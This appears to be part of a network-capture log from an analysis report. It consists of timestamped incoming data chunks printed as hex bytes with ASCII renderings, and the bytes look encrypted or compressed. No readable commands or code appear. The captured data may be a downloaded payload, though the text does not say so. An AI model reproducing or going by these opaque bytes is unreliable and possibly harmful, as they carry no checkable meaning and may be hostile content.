2023-09-07 07:31:08 UTC	277	IN	Data Raw: 2f 62 85 fa 86 ad 74 96 1e 6c 37 9b 33 01 d1 3a 47 fa 2b b8 7c 18 bd 23 43 6e a4 76 be 58 69 26 43 93 82 ea 51 15 2e 0b 7d d3 0f 96 16 59 ae 50 06 db 26 9d 84 33 f5 e1 1a 35 29 1d 46 6d ac 39 75 cf 41 4a a0 b8 1b 9b 71 0f 59 f3 59 b7 52 00 f0 f0 81 5d c0 b3 72 a8 72 45 21 d0 90 12 01 93 f4 fc dc 88 d1 f7 35 86 42 c1 cc 19 8d a6 1a 50 7d 86 f6 f1 ba 6f f5 2b e6 0c ee b1 c8 97 38 ed 1c bd 80 fa 3b c4 4b 0c 1a 06 17 1f c6 a5 4c 48 d2 06 9b 05 73 10 cd 4a 86 07 94 e5 8d 68 3b f0 37 63 f6 ba 41 cb c9 00 57 e0 aa 9f 7b c8 44 58 cc e3 f7 c4 37 55 0b 47 ce 62 5b 45 39 ff e6 b9 9f 9a 99 e9 0c 17 18 56 fa ed 89 4d d5 67 c9 46 ef f4 ff b8 65 3d c6 ce 4f e8 f9 de f5 79 a7 c2 59 62 f0 6f 45 9e e7 ce 11 30 3b 19 5a 03 bd fa 09 64 e9 6f 60 7e cf 8a df c4 7b d7 c5 ca 01 Data Ascii: /btl73:G+\|#CnvXi&CQ.}YP&35)Fm9uAJqYYR]rrE!5BP}o+8;KLHsJh;7cAW{DX7UGb[E9VMgFe=OyYboE0;Zdo`~{
2023-09-07 07:31:08 UTC	278	IN	Data Raw: c2 38 d4 20 3d 73 8b 0f 0b 49 67 11 3a c4 de 77 74 28 3e 24 50 9f 10 03 b5 6c b4 97 47 9f ce a7 79 78 0a a7 65 bf e0 06 b0 fd 50 89 b2 68 b6 8b ba 02 ec c6 3e 0e 04 35 41 2c c5 94 5f e6 fa 74 99 ab e2 00 34 90 09 e4 a5 f2 31 71 e5 23 6a 72 1c 72 7b 3c d3 14 db f3 24 9d 07 88 f6 11 55 37 75 18 bd 76 c3 d4 7e c4 b6 90 34 f3 af ac 08 26 78 5b 32 8a 36 85 36 0a b3 20 50 8d 5e 8d 4b 10 b0 34 2e 0d a4 58 01 83 0e 53 3b b8 e0 38 66 02 a2 68 10 21 12 0a 13 18 01 ef 88 50 e5 7e 92 ea bf 2b 1e 57 fb 5c 1c 78 fe 82 ba 0d 5a ed 65 71 7e e1 f2 34 52 73 24 60 17 bd 9d 02 0e 4b 19 fa 61 5a 7a 4d 08 49 7b 3d fe 0f 76 31 ab ed 43 63 06 37 63 81 44 65 4a 73 4e e7 79 0e cc 45 2f 08 54 78 e0 aa 28 8b 75 41 89 9f 7f 8d b3 6a 8e 17 9c 5e a0 44 aa e5 de b3 90 dc 64 8f 2d 11 16 Data Ascii: 8 =sIg:wt(>$PlGyxePh>5A,_t41q#jrr{<$U7uv~4&x[266 P^K4.XS;8fh!P~+W\xZeq~4Rs$`KaZzMI{=v1Cc7cDeJsNyE/Tx(uAj^Dd-
2023-09-07 07:31:08 UTC	280	IN	Data Raw: c2 17 55 e7 27 16 11 a4 d6 bf 93 d1 22 4f 83 72 7f 3f f6 67 aa 25 e6 7a ad d7 ab 7c 2e 7e 48 5b a2 71 2a f8 91 b8 2a 55 12 d7 d4 d3 de 4f 8d 84 35 51 13 a3 a9 98 db 4b 5b 44 44 d9 da 55 8c 3b f3 02 39 5f 96 5d 7f dc 48 78 bd 87 39 ee 00 a9 fe a4 3b ca c5 cf f9 1c 6c 0a 04 51 ea 3d 32 3e 41 01 ff e7 43 6b 52 9e 70 68 50 2f 38 a6 ed 19 cb 09 c8 3c fc 1f cf b1 89 f3 13 3f 8d 0b 9c 32 10 b9 a9 ed b7 7c d8 86 52 59 ef 73 17 17 43 8f 96 b0 f5 cb d4 a1 de 5c 06 01 bb 0a 0b f7 c3 82 ce dd bd 87 d5 33 7c 56 25 96 b6 eb 47 b4 6c aa 4a 62 25 79 63 5e a7 1d e1 8a 57 1a 80 5f 93 a6 26 8a 04 28 6f dc ac 6b 8d 3e b2 ad ad c8 7d 42 5d 98 30 b7 af 5c c3 60 85 74 88 0d 6f 87 0f a8 e4 12 dc b8 1a 6f ff 40 d6 86 92 76 bc 97 02 ea 88 99 b0 3a f6 67 08 d4 9c 61 d1 ba 05 de d3 Data Ascii: U'"Or?g%z\|.~H[q**UO5QK[DDU;9_]Hx9;lQ=2>ACkRphP/8<?2\|RYsC\3\|V%GlJb%yc^W_&(ok>}B]0\`too@v:ga
2023-09-07 07:31:08 UTC	281	IN	Data Raw: 57 49 62 c7 41 aa b4 4d b1 c3 c6 a6 86 30 b0 ab 5b 95 22 1e 2c 66 b2 e3 94 a3 62 ea 70 dc da f4 de e2 ac 96 57 db 48 71 a0 74 7e 6d 73 0d ac 44 6c c7 a8 72 10 20 f4 02 73 07 d4 9b eb 9c bb 71 e6 97 7f 97 7c 4d b4 26 99 e2 7b ba 4c f7 f8 c7 f7 3e 5f 34 0b 5d 23 6b d2 9d 66 0b 47 91 8b 1f 78 d3 e3 c7 a6 c1 4f 2e 58 f5 ad 15 1b 63 39 4a e0 3d 3b 0a 13 e0 ab 32 6c 17 3d 04 40 c1 73 64 50 f8 9a 71 db b5 bf b2 f0 6c f8 1a c3 51 24 fd 90 4d 17 01 be f6 af 5d 83 5c 3b 57 69 62 aa da 04 53 0a 2c 90 b1 0e 33 df 64 0c 38 fb 78 b0 20 42 46 59 0b 39 c0 7e df 26 02 21 ac e5 b1 7a fb 9d d0 0e ac e8 31 f5 35 c8 fb 5a 9f 16 5e e3 cd 6b 03 a3 14 2a 22 ac f3 ce f1 92 c1 5f b8 64 7e e2 f0 3f 0b 6d 66 87 47 38 06 5f 18 b6 8f 70 54 96 37 ab 0d 35 9f 74 4a a2 9a bd 09 90 58 4b Data Ascii: WIbAM0[",fbpWHqt~msDlr sq\|M&{L>_4]#kfGxO.Xc9J=;2l=@sdPqlQ$M]\;WibS,3d8x BFY9~&!z15Z^k*"_d~?mfG8_pT75tJXK
2023-09-07 07:31:08 UTC	282	IN	Data Raw: 9d e5 ce 11 33 3b 19 5a 03 bc fa 0a 67 ea 6f 63 7e cd 8a dc c7 78 d7 c7 c8 02 82 ab 7d 93 ac 87 8a ba 8d f9 dd 99 bc d9 9e 07 96 21 61 0f ac d2 0a 3b 7e bd bd 06 2a d6 e6 c7 f7 54 35 51 ed b0 0e e6 e9 ea 1b a9 5e ae d8 36 2a 24 59 69 d4 fa 5d e5 08 bf 27 3e aa 40 3b 25 49 af ad f7 b3 d4 b5 d3 50 91 c9 ab 00 f6 c1 70 b0 96 82 94 e7 7f 20 76 68 0e 8d 05 17 04 d5 75 e9 63 cd bc 28 af bd 51 51 51 8e cd 53 88 fe 0c ab 50 da fa 84 4c 68 b1 ee 1f 86 5b 58 cc a9 3c 1a 15 64 09 c5 a5 c5 1e fe 71 05 52 5d cf 11 0f fc fd 45 89 5b cb 80 bc 4a e0 f3 1e e2 4e 6b 3c 05 56 1e c1 de 48 c3 e8 3f f1 fd 62 0e 24 a3 61 5c 46 cf ca b4 c5 52 02 ba 5f e3 a7 97 6c e1 2b ad d3 6f 77 be 14 1e c5 88 c6 01 34 e6 d5 56 e0 3d 6c b6 ea c6 af 0c 3d 0d 04 09 20 04 e5 7b 45 f7 f6 e9 c5 c9 Data Ascii: 3;Zgoc~x}!a;~T5Q^6$Yi]'>@;%IPp vhuc(QQQSPLh[X<dqR]E[JNk<VH?b$a\FR_l+ow4V=l= {E
2023-09-07 07:31:08 UTC	283	IN	Data Raw: 70 8e bf 72 64 84 73 48 91 75 e9 67 a5 5b ba 51 1e 25 4d 6b 27 9f 71 d6 ea ed 96 74 15 66 1b f0 95 85 e3 04 8c 58 5c ca 09 30 04 c0 3e ba 7b bb fe f5 b7 7a 68 eb 2d 7e 47 5d 3a 6c e8 38 90 fa fb 47 ed 72 25 68 08 5d 59 3d ad 40 27 57 9f 40 3a b5 7f d7 12 29 71 29 ac c4 6a 3c b5 17 46 31 e2 9b ed 82 03 29 3f 78 56 04 aa f7 e9 9d 95 f0 d4 99 94 01 7d 56 75 6d e5 97 37 2e 86 b4 d0 3d 47 fa 2b bf 7b 1f bc 24 44 69 a5 70 b8 5e 69 22 46 96 83 ee 54 10 2f 0e 78 d5 0f 94 15 5b af 51 06 db 27 9d 84 30 f5 e0 1a 35 28 ad f7 dd ad c7 8b 32 41 b5 5e 46 1a 64 8f f1 48 0d a7 4a b3 ff 0e 0e 7e a2 3e 4d 8d 57 8c bb de 2e 6e ef ff 6c 0a 02 23 77 2f 09 ca 78 bc 3c 32 e6 73 58 e5 af 83 78 09 0f 44 92 0b d4 18 f2 11 4e 36 69 c7 13 e2 40 7e 05 c5 3a b4 f3 e4 f8 e8 e2 3b 58 b2 Data Ascii: prdsHug[Q%Mk'qtfX\0>{zh-~G]:l8Gr%h]Y=@'W@:)q)j<F1)?xV}Vum7.=G+{$Dip^i"FT/x[Q'05(2A^FdHJ~>MW.nl#w/x<2sXxDN6i@~:;X
2023-09-07 07:31:08 UTC	285	IN	Data Raw: 6b fa 40 d3 82 97 75 ba 90 06 ea 8d 9d b5 3a f3 63 0d d7 9a 66 d5 ba 00 da d6 30 17 bf 14 d5 1f 92 01 ee 28 47 54 42 17 57 74 d8 ce f5 10 bb b7 12 69 31 9c 02 cc be f7 45 5b be bf 70 e1 09 ea 12 5b 29 6c 0d 42 0a 8f 13 16 6f 11 92 ee bd c9 d6 40 cd 7a 37 29 ab ef f4 f0 9e db d9 cb 94 bd 09 bd 2a 69 04 4e 2b a2 c4 62 e0 68 8e 09 65 d9 3c c6 2b dd c0 8e 75 f1 f5 b7 98 ef c4 3a 21 8a 89 d5 c0 da ae 61 ef fd 4b 92 4b 6a ba 62 ff 59 87 86 0a 59 9b 41 e1 fb 4d 00 51 77 4c 96 b6 75 44 fc ed 03 fe f7 05 03 64 c1 c5 a1 7b 0b fa 01 f1 59 e2 69 6c 3c 09 f5 bb d9 30 50 c0 0d 6b 51 3b 5f 7b 1a f6 3b db d6 0d b2 07 aa d0 3d 55 11 51 36 bd 54 e7 fe 7e e7 92 ba 34 d0 89 84 08 06 5a 72 32 ab 14 a3 36 17 93 04 50 92 7e a9 4b 0c 91 11 2e 13 b9 79 01 99 11 70 3b a3 fc 19 66 Data Ascii: k@u:cf0(GTBWti1E[p[)lBo@z7)*iN+bhe<+u:!aKKjbYYAMQwLuDd{Yil<0PkQ;_{;=UQ6T~4Zr26P~K.yp;f
2023-09-07 07:31:08 UTC	286	IN	Data Raw: 9b 78 ba c5 fb a0 e5 4a 73 8e a9 6b ca 54 f0 c8 62 8b e8 3b 6f 43 27 8c b5 b4 51 be 2e e4 cb 4f 10 d6 70 ac 52 ab a6 59 5b 5e 60 29 d5 ff 7b 03 f1 40 7f c3 55 6e 53 f9 b6 dd 24 6b 0e 32 af 26 f6 25 a9 0d 7b 0b ad 36 0c d6 9f 00 66 7b e2 ef 73 40 e4 82 4d 36 33 ad 0f 9c d4 c6 40 c3 3f 29 fd 46 ce 99 76 7b da 8d 87 a2 ac a1 0a 19 d9 d6 1b 1a 55 31 f1 1c 11 71 03 b1 93 07 f4 45 83 a5 a9 35 f6 b3 7f 2c e6 ad 7b dd ab ab f8 75 48 8f 76 79 2a 2f 46 b3 2a 82 c5 dc d4 04 0a 47 8c 50 e2 59 12 77 7d 90 db 9c 8c 4f 45 0d 0e 5d 8d ef 27 0b 39 89 41 57 7e 09 9e 72 bc 52 ef e4 00 7f 28 af 3a 1f 13 ca f8 7e 09 bc 04 7d c6 c5 33 12 6d f9 fe cb 6f 92 42 30 dd 9a b0 dc ca 56 13 ed 38 f8 37 ca 09 eb 30 48 70 0b ed c5 74 f3 63 c8 e9 41 56 14 4e 84 26 33 fc ad 10 e5 9a e5 bd Data Ascii: xJskTb;oC'Q.OpRY[^`){@UnS$k2&%{6f{s@M63@?)Fv{U1qE5,{uHvy/FGPYw}OE]'9AW~rR(:~}3moB0V870HptcAVN&3
2023-09-07 07:31:08 UTC	287	IN	Data Raw: c8 f0 d7 ab 1c 2a 6e 4b 16 d1 ad f0 c1 1b 06 f4 dc 13 e7 9f a0 e2 f4 0a 26 dc 2e d8 f2 df 01 e4 b4 c5 21 78 01 de 2e 7f 12 1f 21 45 87 3b 6a 84 3c 83 6e ba b2 e7 3c b7 d1 85 2b e3 ec 15 77 79 1c 10 10 58 e1 9b df 3c 06 6e bb 1c 94 e1 55 9b 62 8a c1 76 f9 8b 86 2b ff 14 ab 2b 7c 0b e2 6f 23 0e 60 0c 02 14 e0 98 0f 8f 0a 11 2c 83 03 9e 57 a1 72 5c db 42 54 a3 5d 2a 38 49 68 db 4f 59 ab 7b dd e6 db 90 4c 1b 6c 55 9d 12 88 2a 25 0c 29 14 52 6e af 2d b7 89 57 82 80 95 8b fb 53 bc 94 31 57 8a e7 d6 0a fa 8b f1 2b 63 13 6a 44 89 11 61 81 6f 84 bb 4b de 61 14 84 42 bb 01 06 3f 0f c8 bf cc f3 ab 33 93 25 6b 67 f3 bf 67 8a a8 cf 6a e3 c2 ac ca 4f 28 5e fd ad 13 1d 6b 39 4f ea 36 3b 0f 16 eb ab 37 69 1c 3d 01 4b cb 73 62 57 ff 9a 73 d9 b7 bf b1 f2 6e f8 18 c1 53 24 Data Ascii: nK&.!x.!E;j<n<+wyX<nUbv++\|o#`,Wr\BT]8IhOY{LlU*%)Rn-WS1W+cjDaoKaB?3%kggjO(^k9O6;7i=KsbWsnS$
2023-09-07 07:31:08 UTC	288	IN	Data Raw: 92 df 2b 18 f2 c5 b1 36 69 14 ed e2 40 aa fa 5d ad 69 0c 0d 1f 0c 1c d1 b0 57 24 b6 18 8d d4 99 08 c6 8b 5e 1f 9e c6 a3 65 30 f0 3f 68 fd 96 79 c7 c3 ce be f8 a1 e0 fb cd 4f 59 c5 e8 fd c4 3f 5e 00 47 c7 69 51 45 30 f7 ed b9 97 91 92 e9 05 1c 12 56 f3 e5 82 4d dd 6c c2 46 e6 ff f5 b8 6c 35 cd ce 47 e3 f2 de fc 72 ad c2 50 6a fb 6f 4d 95 ec ce 18 3b 31 19 53 0b b6 fa 01 6f e2 6f 69 75 c5 8a d6 cc 70 d7 cd c1 0a 82 ac 79 97 ac 85 88 b9 8d fb df 9b bc db 9c 04 96 93 d3 bc ac 2e f6 c7 7e 40 40 fa 2a 2b 1b 3b e7 a8 c9 ad 0c 4d f3 1a 16 17 e6 55 a1 53 25 ca d5 d8 a5 95 2a 07 a0 19 f7 42 da c2 55 bc c7 d9 b7 52 50 0b 4c 29 48 2f af 6d 35 57 fe 0b 3c 8c 4f 6b 7f 68 18 83 dc 8a 59 f3 70 f9 17 f9 28 89 e8 9f 31 59 29 52 40 6d 51 ac 73 fc 52 74 02 3d aa ad 27 cb 84 Data Ascii: +6i@]iW$^e0?hyOY?^GiQE0VMlFl5GrPjoM;1Sooiupy.~@@+;MUS%BURPL)H/m5W<OkhYp(1Y)R@mQsRt='
2023-09-07 07:31:08 UTC	289	IN	Data Raw: 88 38 09 ba 2e 5f 8c 54 80 45 11 ba 39 20 0e ad 56 0e 82 04 5e 35 b9 ea 35 68 01 ab 66 1f 20 18 07 1d 19 0b e2 86 53 e1 7b 9b eb be 2a 1e 56 fb 5c 1d 7b fc 80 bb 0f e8 5f d5 73 83 1d 0d 36 ae 8f da 62 ea 41 62 a3 40 05 e6 e5 61 5a 84 4d 08 49 84 3d fe 0f 99 31 ab ed 5c 63 06 37 63 81 44 65 4a 73 4e e7 79 0e cc 45 2f 08 54 78 e0 aa 28 8b 75 41 89 9f 7f 8d b3 6a 8e 17 9c 5e a0 8b aa e5 de 4c 90 dc 64 71 2d 11 00 97 8f ee 31 1a 0b 6e c6 e3 f4 7c 18 5d 1f dc 0e 05 15 eb 84 7a 6d 28 cb b7 ce d5 d1 2c ab 83 47 3a 67 e4 3d 91 48 49 70 ec ff 91 59 08 89 8d 00 ac 03 64 47 9e 45 3f b0 7f b6 73 31 70 e6 63 f8 6b 10 99 18 46 35 e6 9f ec 22 a3 00 3e ae 80 3a aa 22 3c a3 94 4d 69 ae 95 26 5a 58 75 69 e1 93 36 42 ea ad d1 e8 92 c4 2a 31 f5 3d bc 20 40 6d a4 48 80 4a 68 Data Ascii: 8._TE9 V^55hf S{V\{_s6bAb@aZMI=1\c7cDeJsNyE/Tx(uAj^Ldq-1n\|]zm(,G:g=HIpYdGE?s1pckF5">:"<Mi&ZXui6B1= @mHJh
2023-09-07 07:31:08 UTC	291	IN	Data Raw: 1f cf b1 89 f3 13 3f 8d 0b 9c 32 10 b9 a9 ed b7 7c d8 86 52 59 ef 73 17 17 43 40 96 b0 f5 34 d4 a1 de a2 06 01 af f5 0b f7 59 7d ce dd 19 79 c3 25 d0 a9 7f cc 72 14 1d ee a8 55 10 38 e1 87 3d 00 7d e2 77 1c 61 e4 1f c0 b0 59 b9 15 26 98 bf 0d 88 68 e5 57 94 ac 20 46 4f 43 f8 3e 0b b4 08 fb f9 61 27 d6 b3 0c 03 eb 27 ab 86 70 fe b9 7b 0e dc 41 b7 e7 b6 75 d4 ff 24 eb 03 12 82 3b 55 c4 32 d7 3b c6 eb bb a1 7a e8 31 b6 1f 2a d4 95 19 37 ee 4c 22 72 43 73 32 52 d9 aa 90 31 bb d3 77 4f 30 f8 67 ea bf 94 26 7c be d7 18 c6 08 4e b6 61 28 c8 a9 78 0a 9a 06 9d 6e 29 aa 56 bc c9 d6 e4 cd 7a 37 8d ba 7f 79 33 7e 06 00 1f 6a 63 d3 6b d5 8b db 95 d4 53 2b 8f 1e 99 61 e4 9a 28 d3 2b d4 2c 2f 63 8b 00 1a 5a 67 1e 2b d7 df 7b 66 38 3f 2b 41 8c 10 0c a4 7f b5 9b 55 8f cf Data Ascii: ?2\|RYsC@4Y}y%rU8=}waY&hW FOC>a''p{Au$;U2;z1*7L"rCs2R1wO0g&\|Na(xn)Vz7y3~jckS+a(+,/cZg+{f8?+AU
2023-09-07 07:31:08 UTC	292	IN	Data Raw: 00 c8 30 8c f7 5e 07 a1 20 11 66 b0 18 f9 73 3b 55 dc b1 11 8d 9a 18 23 b1 47 ff 70 ad 74 02 5f 17 cd 5f 63 bc 58 55 89 82 c9 d8 e5 b2 68 2f 70 51 6d 31 3f 84 6f 3a 1b 98 d3 23 a3 a7 3b 09 d9 20 1d dd c6 e2 42 af 04 50 18 f9 7d 30 6d ae 08 d1 96 36 29 1a 38 9d f9 b1 84 cf 96 fe d3 17 d6 de c2 f1 a8 96 a7 c3 4c a9 72 7d f0 e0 28 09 7e 77 91 45 2b 17 49 1b a4 9f 67 56 85 26 bd 0f 26 8e 62 16 d5 83 aa d8 62 59 5d af 50 c2 0d 34 a1 fc 3f 8f 42 be 42 58 b7 b7 b7 50 c7 39 16 7b ed 1d a9 7f 2d b9 9e 53 17 5a 8b 24 85 e2 17 af c8 1a 00 a9 e3 97 2e ad d8 e0 f3 9e ee 8a 5e e3 0d 93 71 e4 44 86 2c 33 6b c4 81 d4 00 84 de 3f ef 36 5c ce 5f bd 61 da 4b 4c b8 ac 67 c1 03 d9 0b c8 1b 55 e6 26 17 11 a7 d5 bc 93 d0 23 4e 83 c3 ce 8e f6 9a 57 d8 e6 84 53 29 ab 82 d0 80 58 Data Ascii: 0^ fs;U#Gpt__cXUh/pQm1?o:#; BP}0m6)8Lr}(~wE+IgV&&bbY]P4?BBXP9{-SZ$.^qD,3k?6\_aKLgU&#NWS)X
2023-09-07 07:31:08 UTC	293	IN	Data Raw: 11 0d 06 c2 61 f2 61 db a8 33 ad aa 45 4b 53 99 d9 48 8a e8 18 b0 52 cd ee 9e 4e 7f a5 f5 3e b0 4a 43 0b 64 39 01 7d 00 15 df 84 f3 0f e5 ed b9 4a 46 cb 01 1b e7 ff 52 9d 41 c9 97 a8 51 e2 e5 0a f9 4c 7c 28 1f 54 09 d5 c5 4a d5 fc 24 f3 ea 76 14 26 b4 75 47 44 d9 de af c7 45 16 a0 5d f4 b3 8c 6e f7 3f b6 d1 78 63 a4 16 09 d1 93 c4 17 20 fd d7 41 f4 27 6e a1 fe dd ad 03 33 03 06 0b 23 04 e7 78 47 f6 f4 ea c6 c8 2e 88 a2 7b 01 fb ab 2e 21 60 19 34 2e 7e 13 f7 31 45 87 d3 8b 84 3c 6b 91 ba b2 0f c3 b7 d1 6d d4 e9 e6 fc 89 66 03 fb ef 4e f7 71 20 3c 06 86 45 1c 94 09 aa 9b 62 62 3e 76 f9 63 78 2b ff fc 54 2b 7c e3 1d 6f 23 e6 50 0c 02 fc e1 98 0f 67 0b 11 2c 6b 03 9e 57 49 73 c7 41 aa 55 4d b1 c3 38 a6 86 30 4e ab 5b 95 dc 1e 2c 66 4c ac db ec 9c 14 8e 22 24 Data Ascii: aa3EKSHRN>JCd9}JFRAQL\|(TJ$v&uGDE]n?xc A'n3#xG.{.!`4.~1E<kmfNq <Ebb>vcx+T+\|o#Pg,kWIsAUM80N[,fL"$
2023-09-07 07:31:08 UTC	294	IN	Data Raw: 4e 54 69 f8 8f 16 2a 9b ac f1 38 5a e2 0a bb 66 07 9d 20 58 77 ba 75 bf 59 6b 26 42 92 82 ea 51 15 2f 0b 73 de 01 96 f2 bd 4b 50 f8 25 d9 9d 7a ce 0b e1 e4 cb d6 3e b8 93 53 c3 8b 32 bf b5 5e 46 e4 64 8f f1 a6 0d a7 4a ac ff 0e 0e 7e a2 3e 4d 8d 57 8c bb de 2e 6e ef ff 6c 0a 02 23 77 2f 09 ca 78 bc 3c 32 e6 73 58 e5 af 83 78 09 0f 44 92 0b d4 18 f2 11 4e 36 69 c7 13 e2 40 7e 05 c5 3a b4 f3 e4 f8 e8 e2 3b 58 b2 72 5b f3 64 d5 6f fd 32 8b aa ea 69 c7 e2 25 72 f1 37 63 f7 96 70 cf c9 cf b6 f3 ab e0 f8 c9 4a 58 d7 fc d7 c5 2d 4a 29 47 d4 7e 78 44 23 e0 c4 b8 85 85 bb e9 16 0b 3b 57 e0 f2 ab 4c cf 78 eb 46 f5 e8 dc b9 7f 22 e4 cf 55 f7 db de ef 65 84 c3 43 7d d2 6e 5f 81 c5 ce 0b 2c 18 18 40 1c 9f fb 13 7b cb 6f 7a 62 ec 8b c5 db 59 d6 df d5 23 82 b2 61 b2 ad Data Ascii: NTi*8Zf XwuYk&BQ/sKP%z>S2^FdJ~>MW.nl#w/x<2sXxDN6i@~:;Xr[do2i%r7cpJX-J)G~xD#;WLxF"UeC}n_,@{ozbY#a
2023-09-07 07:31:08 UTC	296	IN	Data Raw: 8e 75 f1 f5 b7 98 ef c4 3a 21 8a 89 d5 c0 da ae 61 ef fd 4b 92 4b 6a ba 62 30 59 87 86 f5 59 9b 41 1f fb 4d 00 ae 77 4c 96 49 19 44 fc 13 fd fe f7 fa fd 64 c1 3a 5f 77 07 09 ff 5c f4 b1 d3 d1 83 08 d0 9d f5 30 72 e6 20 6a 72 1c 72 7a 3f d0 17 db f3 24 9d 06 88 f6 11 54 34 76 1b bd 76 c3 d4 7f c4 b6 90 35 f0 ac af 08 26 78 5b 33 8a 36 85 37 09 b0 23 50 8d 5e 8d 4a 10 b0 34 2f 0e a7 5b 01 83 0e 53 3a b8 e0 38 67 01 a1 6b 10 21 12 0a 12 18 01 ef 89 53 e6 7d 92 ea bf 2b 1f 57 fb 5c 1d 7b fd 81 ba 0e 59 ee 64 72 7d e3 f3 36 50 71 24 63 14 bf 9c b2 be fb 18 04 9f a4 7a b3 f6 b7 7a c3 00 f1 67 cf 55 13 a2 9d f8 c9 9d 7f ba 9b b4 8d b0 19 87 f0 32 bb d1 f6 aa 86 1e 54 d6 75 8b bf 77 61 81 73 4d 94 70 e9 62 a0 5e ba 54 1b 20 4d 6e 22 9a 71 d3 ef e8 96 71 10 63 1b Data Ascii: u:!aKKjb0YYAMwLIDd:_w\0r jrrz?$T4vv5&x[367#P^J4/[S:8gk!S}+W\{Ydr}6Pq$czzgU2TuwasMpb^T Mn"qqc
2023-09-07 07:31:08 UTC	297	IN	Data Raw: e8 ee a7 2b 42 6d d1 dc b1 7c 72 81 c1 09 64 57 d8 18 7a 53 29 54 7c d0 80 b7 58 5f 8c d4 f8 6f 46 d5 55 ec 29 2b d0 23 b2 73 84 cb af ec a3 57 66 24 48 a6 b9 ba d9 24 ab 73 3b 0d fc c6 5c 6b a0 81 dc b5 85 42 87 c4 13 ff aa 03 58 c5 ca 38 32 06 ac 22 44 fb af ea 3d cc c0 41 01 00 19 43 6b bd 60 70 68 4f d1 38 a6 ed e7 cb 09 c8 c2 fc 1f cf 4f 89 f3 13 c1 8d 0b 9c cc 10 b9 a9 13 b7 7c d8 78 52 59 ef 8d 17 17 43 71 96 b0 f5 35 d4 a1 de a2 06 01 bb f4 0b f7 c3 7c ce dd bd 79 d5 33 7c a8 25 96 b6 15 47 b4 6c 54 4a 62 25 87 63 5e b8 e3 e1 8a b8 e4 80 5f 6c 58 26 8a fa 99 20 92 53 68 70 c2 4c ad 53 35 82 42 a3 65 cf b4 52 a1 3d 60 7b 8a 77 0d 91 79 f0 ab 19 ef 22 90 e4 91 00 97 28 78 6d 8b 41 6a fc 14 76 67 4f c4 08 99 f7 29 61 9c 2f 44 fb 20 2c ce ec 45 ee 2b Data Ascii: +Bm\|rdWzS)T\|X_oFU)+#sWf$H$s;\kBX82"D=ACk`phO8O\|xRYCq5\|y3\|%GlTJb%c^_lX& ShpLS5BeR=`{wy"(xmAjvgO)a/D ,E+
2023-09-07 07:31:08 UTC	298	IN	Data Raw: aa ab d2 b1 c3 c6 39 86 30 b0 34 5b 95 22 81 2c 66 b2 7c 94 a3 62 75 70 dc da 6b de e2 ac 09 57 db 48 ee a0 74 7e f2 73 0d ac db 6c c7 a8 ed 10 20 f4 9d 73 07 d4 04 eb 9c bb ee e6 97 7f 08 7c 4d b4 b9 99 e2 7b 25 4c f7 f8 58 f7 3e 40 ab 0b 5d cc f4 d2 9d 99 94 47 91 75 cf 37 9c 1c a5 5b 3c b1 5b a6 0b 52 b7 e5 9d c6 92 1d c0 c5 f7 ee 1d 54 cf 91 ea c2 f9 bc 3d 8d 99 ad 05 65 8c 26 48 40 4f 0c 90 06 e7 3e ac db 00 6d b0 e8 fc 42 0a 51 a0 7e a1 c4 aa 94 9f 55 27 f8 af f4 d1 6d 4c f1 ce 22 99 f3 c5 06 85 4f dd be ba a7 f6 c4 3d 81 22 24 00 1e 51 19 4d 84 06 60 2e 0e ae ea 32 0a c8 34 07 a4 62 eb a3 63 cf 69 02 5c e9 d6 de 52 0e 33 0c 52 c3 5d bd 9b 83 1e 0c c1 f6 90 9b 67 45 3a 0b a0 e5 4a 73 8e a9 6b ca 5b 0f 37 82 8b e8 3b 6f 43 27 8c b5 b3 ae 41 ce e4 cb Data Ascii: 904[",f\|bupkWHt~sl s\|M{%LX>@]Gu7[<[RT=e&H@O>mBQ~U'mL"O="$QM`.24bci\R3R]gE:Jsk[7;oC'A
2023-09-07 07:31:08 UTC	299	IN	Data Raw: c5 e6 a4 fd 42 02 08 65 f6 91 9e 83 31 75 21 3a 84 2f c4 cb 0e 7c 56 80 6f 53 7a 77 46 7d fa de 9d 42 24 63 fb 69 dc 9c f3 4c d1 09 3b 80 40 40 fa d5 2b 1b 3b 37 57 36 53 13 4d f3 1a 16 17 e6 55 de ac da 35 15 d8 a5 95 2a 07 a0 1a 08 bd f2 c2 55 bc 97 d9 b7 52 f0 0b 4c 29 49 2f 8f 6d 35 57 fe 0b fc eb 4f 6b 7f 68 18 83 dc 8a 96 f3 70 f9 e8 f9 28 89 16 9f 31 40 d6 52 40 ad ae ac 73 31 ac 74 02 f0 55 ad 27 06 7b b1 95 4d 11 c0 5a a2 a6 f4 8e d1 e5 83 ea fd 3a 7b 19 e7 00 12 53 a2 a2 35 eb f3 02 00 b8 75 a4 36 7d 40 b5 1c 0f e2 1c b4 96 c0 fa ef e3 3d 21 31 3f 14 c1 a6 00 9e f1 76 5e 9d a3 15 33 36 4a 97 af fe 45 0d 1e 5b 68 3f 1d d7 53 81 92 8b 41 46 e3 39 77 95 fd c8 18 87 ab 1c c2 3e 4b 16 39 fc f0 c1 f3 56 f4 dc fb b7 86 b9 08 a5 15 39 37 7e c7 ed 34 51 Data Ascii: Be1u!:/\|VoSzwF}B$ciL;@@+;7W6SMU5*URL)I/m5WOkhp(1@R@s1tU'{MZ:{S5u6}@=!1?v^36JE[h?SAF9w>K9V97~4Q
2023-09-07 07:31:08 UTC	300	IN	Data Raw: 06 f8 4d 11 f7 62 62 25 d9 31 54 9e a7 c6 6e a7 1d fa d3 6a 6f 1d 70 95 e4 90 f4 15 07 68 00 0c da d7 ce 89 b2 8f c4 be 38 f0 bf 7e 77 3c 0a 95 61 a6 b0 1c c9 b1 67 60 bb 1b ff 7a c5 66 2d c7 e5 83 59 d9 bf 26 44 a7 d5 14 44 b0 21 ed d3 aa 90 cf 2d 5f 37 9c 38 4e ec b8 35 19 60 13 86 f8 d2 c1 7c ad ff 54 dc 12 66 6b 13 2f 62 6a fa 86 ad 8b 96 1e 6c c9 d5 7d 4f 2e c6 bc 01 d5 44 80 e4 42 df bf 92 5b 8b 43 a5 97 d9 bd 6d 7d 15 af eb d1 f5 83 2e f1 69 e8 a7 51 af f8 25 d9 63 7a ce 0b 1e e4 cb d6 e2 b8 93 53 c7 8b 32 bf b5 5e 46 e4 64 8f f1 a6 0d a7 4a ac fe 0e 0e 7e 1f 3e 4d 8d a9 8c bb de d0 6e ef ff 92 41 48 6b 89 ee b7 73 86 60 e4 e0 18 ae 81 36 51 5e a1 da f1 99 4b d8 2a c5 2b c2 b0 eb b0 14 ed 3f 99 ad fb 18 e3 67 0d 39 21 3b 1c e6 81 61 25 86 2a b7 d5 Data Ascii: 